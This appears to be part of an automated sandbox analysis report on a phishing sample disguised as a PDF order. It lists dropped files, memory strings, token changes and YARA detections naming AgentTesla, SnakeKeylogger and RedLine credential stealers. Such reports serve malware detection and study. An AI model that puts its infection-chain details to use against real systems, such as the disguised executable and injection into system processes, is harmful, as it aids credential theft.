Source: surmit.exe, 00000007.00000002.1722702719.00000000004AE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_7e7e6b58-6
Source: surmit.exe, 00000019.00000002.1848808346.00000000004AE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b37b9521-4
Source: surmit.exe, 00000019.00000002.1848808346.00000000004AE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_aa198915-6
Source: surmit.exe, 0000001C.00000000.1846726904.00000000004AE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_3d2f6523-8
Source: surmit.exe, 0000001C.00000000.1846726904.00000000004AE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e38f9e90-1

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: Order SMG 201906 20190816order.pdf.scr.exe
Source: initial sample	Static PE information: Filename: Order SMG 201906 20190816order.pdf.scr.exe

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0044D0B8: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0044D0B8

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0043ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_0043ACC5

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_004479D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_004479D3

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\314fa8116a46337b.bin

Jump to behavior

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0042B043	0_2_0042B043
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00413200	0_2_00413200
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00413B70	0_2_00413B70
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0043410F	0_2_0043410F
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0041B11F	0_2_0041B11F
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_004631BC	0_2_004631BC
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0042D1B9	0_2_0042D1B9
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0043724D	0_2_0043724D
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0042123A	0_2_0042123A
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_004202A4	0_2_004202A4
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_004413CA	0_2_004413CA
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0040E3E3	0_2_0040E3E3
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_004093F0	0_2_004093F0
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0043038E	0_2_0043038E
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0041F563	0_2_0041F563
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0043467F	0_2_0043467F
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_004096C0	0_2_004096C0
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0044B6CC	0_2_0044B6CC
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_004206D9	0_2_004206D9
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0046F7FF	0_2_0046F7FF
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0041FA57	0_2_0041FA57
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0046AACE	0_2_0046AACE
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00434BEF	0_2_00434BEF
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0041FE6F	0_2_0041FE6F
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00429ED0	0_2_00429ED0
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0040AF50	0_2_0040AF50
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00406F07	0_2_00406F07
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00C200D9	0_2_00C200D9
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BE51EE	0_2_00BE51EE
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BE6EAF	0_2_00BE6EAF
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00C1D580	0_2_00C1D580
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00C1C7F0	0_2_00C1C7F0
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00C13780	0_2_00C13780
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00C15980	0_2_00C15980
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00C239A3	0_2_00C239A3
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BE7B71	0_2_00BE7B71
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BE7F80	0_2_00BE7F80
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00DFCB58	0_2_00DFCB58
Source: C:\Windows\System32\AppVClient.exe	Code function: 6_2_00BCA810	6_2_00BCA810
Source: C:\Windows\System32\AppVClient.exe	Code function: 6_2_00BA7C00	6_2_00BA7C00
Source: C:\Windows\System32\AppVClient.exe	Code function: 6_2_00BA79F0	6_2_00BA79F0
Source: C:\Windows\System32\AppVClient.exe	Code function: 6_2_00BD2D40	6_2_00BD2D40
Source: C:\Windows\System32\AppVClient.exe	Code function: 6_2_00BCEEB0	6_2_00BCEEB0
Source: C:\Windows\System32\AppVClient.exe	Code function: 6_2_00BC92A0	6_2_00BC92A0
Source: C:\Windows\System32\AppVClient.exe	Code function: 6_2_00BC93B0	6_2_00BC93B0
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 7_2_00B139A3	7_2_00B139A3
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 7_2_00AD6EAF	7_2_00AD6EAF
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 7_2_00B05980	7_2_00B05980
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 7_2_00AD51EE	7_2_00AD51EE
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 7_2_00B0D580	7_2_00B0D580
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 7_2_00AD7F80	7_2_00AD7F80
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 7_2_00B03780	7_2_00B03780
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 7_2_00B0C7F0	7_2_00B0C7F0
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 7_2_00CF8338	7_2_00CF8338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00408C60	9_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040DC11	9_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00407C3F	9_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418CCC	9_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00406CA0	9_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004028B0	9_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041A4BE	9_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418244	9_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00401650	9_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402F20	9_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004193C4	9_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418788	9_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402F89	9_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402B90	9_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004073A0	9_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_020B0FE0	9_2_020B0FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_020B1030	9_2_020B1030
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 10_2_022B92A0	10_2_022B92A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 10_2_022BEEB0	10_2_022BEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 10_2_022B93B0	10_2_022B93B0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 10_2_02297C00	10_2_02297C00
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 10_2_022BA810	10_2_022BA810
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 10_2_022C2D40	10_2_022C2D40
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 10_2_022979F0	10_2_022979F0
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Code function: 11_2_02A33188	11_2_02A33188
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Code function: 11_2_02A385B7	11_2_02A385B7
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Code function: 11_2_02A385C8	11_2_02A385C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_0323B490	14_2_0323B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_0323B470	14_2_0323B470
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 21_2_0270326C	21_2_0270326C
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 25_2_00C37B88	25_2_00C37B88
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 25_2_02BD39A3	25_2_02BD39A3
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 25_2_02B96EAF	25_2_02B96EAF
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 25_2_02BC5980	25_2_02BC5980
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 25_2_02B951EE	25_2_02B951EE
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 25_2_02B97F80	25_2_02B97F80
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 25_2_02BC3780	25_2_02BC3780
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 25_2_02BCC7F0	25_2_02BCC7F0
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 25_2_02BCD580	25_2_02BCD580
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_00BA7F08	28_2_00BA7F08
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_0304515C	28_2_0304515C
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_03035980	28_2_03035980
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_03006EAF	28_2_03006EAF
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_030439A3	28_2_030439A3
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_030051EE	28_2_030051EE
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_03007F80	28_2_03007F80
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_03033780	28_2_03033780
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_0303C7F0	28_2_0303C7F0
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Code function: 28_2_0303D580	28_2_0303D580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 29_2_053B1030	29_2_053B1030
Source: C:\Windows\System32\FXSSVC.exe	Code function: 37_2_00427C00	37_2_00427C00
Source: C:\Windows\System32\FXSSVC.exe	Code function: 37_2_0044A810	37_2_0044A810
Source: C:\Windows\System32\FXSSVC.exe	Code function: 37_2_00452D40	37_2_00452D40
Source: C:\Windows\System32\FXSSVC.exe	Code function: 37_2_004279F0	37_2_004279F0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 37_2_004492A0	37_2_004492A0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 37_2_0044EEB0	37_2_0044EEB0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 37_2_004493B0	37_2_004493B0
Source: C:\Windows\System32\SensorDataService.exe	Code function: 42_2_0070A810	42_2_0070A810
Source: C:\Windows\System32\SensorDataService.exe	Code function: 42_2_006E7C00	42_2_006E7C00
Source: C:\Windows\System32\SensorDataService.exe	Code function: 42_2_00712D40	42_2_00712D40
Source: C:\Windows\System32\SensorDataService.exe	Code function: 42_2_006E79F0	42_2_006E79F0
Source: C:\Windows\System32\SensorDataService.exe	Code function: 42_2_0070EEB0	42_2_0070EEB0
Source: C:\Windows\System32\SensorDataService.exe	Code function: 42_2_007092A0	42_2_007092A0
Source: C:\Windows\System32\SensorDataService.exe	Code function: 42_2_007093B0	42_2_007093B0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: String function: 0042F8A0 appears 35 times
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: String function: 00426AC0 appears 41 times
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: String function: 0041EC2F appears 68 times

Source: 117.0.5938.132_chrome_installer.exe.2.dr	Static PE information: Resource name: B7 type: 7-zip archive data, version 0.4
Source: 117.0.5938.132_chrome_installer.exe.2.dr	Static PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
Source: Acrobat.exe.2.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: OneDriveSetup.exe.2.dr	Static PE information: Resource name: PAYLOAD type: Microsoft Cabinet archive data, many, 47694794 bytes, 767 files, at 0x44 +A "adal.dll" +A "alertIcon.png", flags 0x4, number 1, extra bytes 20 in head, 6100 datablocks, 0x1503 compression

Source: msedgewebview2.exe.2.dr	Static PE information: Number of sections : 14 > 10
Source: msedge_proxy.exe0.2.dr	Static PE information: Number of sections : 12 > 10
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: Number of sections : 13 > 10
Source: pwahelper.exe0.2.dr	Static PE information: Number of sections : 12 > 10
Source: identity_helper.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: msedge_proxy.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: pwahelper.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: elevation_service.exe0.2.dr	Static PE information: Number of sections : 12 > 10
Source: notification_click_helper.exe.2.dr	Static PE information: Number of sections : 13 > 10
Source: setup.exe.2.dr	Static PE information: Number of sections : 13 > 10
Source: elevation_service.exe.2.dr	Static PE information: Number of sections : 12 > 10

Source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000003.1672003436.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameALG.exej% vs Order SMG 201906 20190816order.pdf.scr.exe
Source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000003.1667977436.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamearmsvc.exeN vs Order SMG 201906 20190816order.pdf.scr.exe

Source: unknown

Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys

Source: Order SMG 201906 20190816order.pdf.scr.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 9.2.RegSvcs.exe.36e2790.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 13.0.neworigin.exe.e00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.RegSvcs.exe.36a5570.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.0.server02.exe.880000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.0.server02.exe.880000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.36a5570.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 25.2.surmit.exe.4050000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 7.2.surmit.exe.41a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.RegSvcs.exe.36e2790.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 28.2.surmit.exe.49a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.RegSvcs.exe.38575f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 9.2.RegSvcs.exe.38575f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.38575f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000001C.00000002.1909944306.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
